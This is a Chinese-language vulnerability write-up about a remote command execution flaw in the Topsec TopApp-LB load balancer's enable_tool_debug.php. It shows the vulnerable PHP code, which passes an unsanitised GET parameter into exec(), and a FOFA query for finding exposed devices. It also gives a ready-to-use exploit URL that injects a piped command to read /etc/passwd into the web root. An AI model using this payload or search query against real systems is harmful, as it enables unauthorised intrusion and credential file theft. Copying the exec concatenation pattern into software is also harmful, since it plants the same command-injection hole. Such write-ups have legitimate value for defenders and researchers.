menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 天融信 chevron_right 天融信负载均衡TopApp-LB enable_tool_debug.php 远程命令执行漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    天融信负载均衡TopApp-LB enable_tool_debug.php 远程命令执行漏洞.md
    2.16 KB / 2021-07-04 06:01:08
        # 天融信负载均衡TopApp-LB enable_tool_debug.php 远程命令执行漏洞
    
    ## 漏洞描述
    
    天融信 TopSec-LB enable_tool_debug.php文件存在 远程命令执行漏洞,通过命令拼接攻击者可以执行任意命令
    
    ## 漏洞影响
    
    > [!NOTE]
    >
    > 天融信 TopSec-LB
    
    ## FOFA
    
    > [!NOTE]
    >
    > app="天融信-TopApp-LB-负载均衡系统"
    
    ## 漏洞复现
    
    登录页面如下
    
    ![image-20210618212425381](http://wikioss.peiqi.tech/vuln/image-20210618212425381.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)
    
    漏洞文件为 **enable_tool_debug.php**
    
    ```php
    <?php
    require_once dirname(__FILE__)."/../common/commandWrapper.inc";
    error_reporting(E_ALL ^ E_WARNING ^ E_NOTICE);
    $val = $_GET['val'];
    $tool = $_GET['tool'];
    $par = $_GET['par'];
    runTool($val,$tool,$par);
    ?>
    ```
    
    **commandWrapper.inc** 文件中的 **runTool**
    
    ```php
    function runTool($val,$tool,$par){
    	if($val=="0"){
    		UciUtil::setValue('system', 'runtool', 'tool', $tool);
    		UciUtil::setValue('system', 'runtool', 'parameter', $par);
    		UciUtil::commit('system');
    		if($tool=="1"){
    			exec('ping '.$par.'>/tmp/tool_result &');
    		}else if($tool=="2"){
    			exec('traceroute '.$par.'>/tmp/tool_result &');
    		}
    	}else if($val=="1"){
    		$tool=UciUtil::getValue('system', 'runtool', 'tool');
    		if($tool=="1"){
    			exec('killall ping ');
    		}else if($tool=="2"){
    			exec('killall traceroute ');
    		}
    		UciUtil::setValue('system', 'runtool', 'tool', '');
    		UciUtil::setValue('system', 'runtool', 'parameter', '');
    		UciUtil::commit('system');
    		exec('echo "">/tmp/tool_result');
    	}
    	
    }	
    ```
    
    这里设置 var=0,tool=1,再进行命令拼接造成远程命令执行
    
    ```
    /acc/tools/enable_tool_debug.php?val=0&tool=1&par=127.0.0.1' | cat /etc/passwd > ../../test.txt |'
    ```
    
    ![image-20210618213319663](http://wikioss.peiqi.tech/vuln/image-20210618213319663.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)
    
    
    
    links
    file_download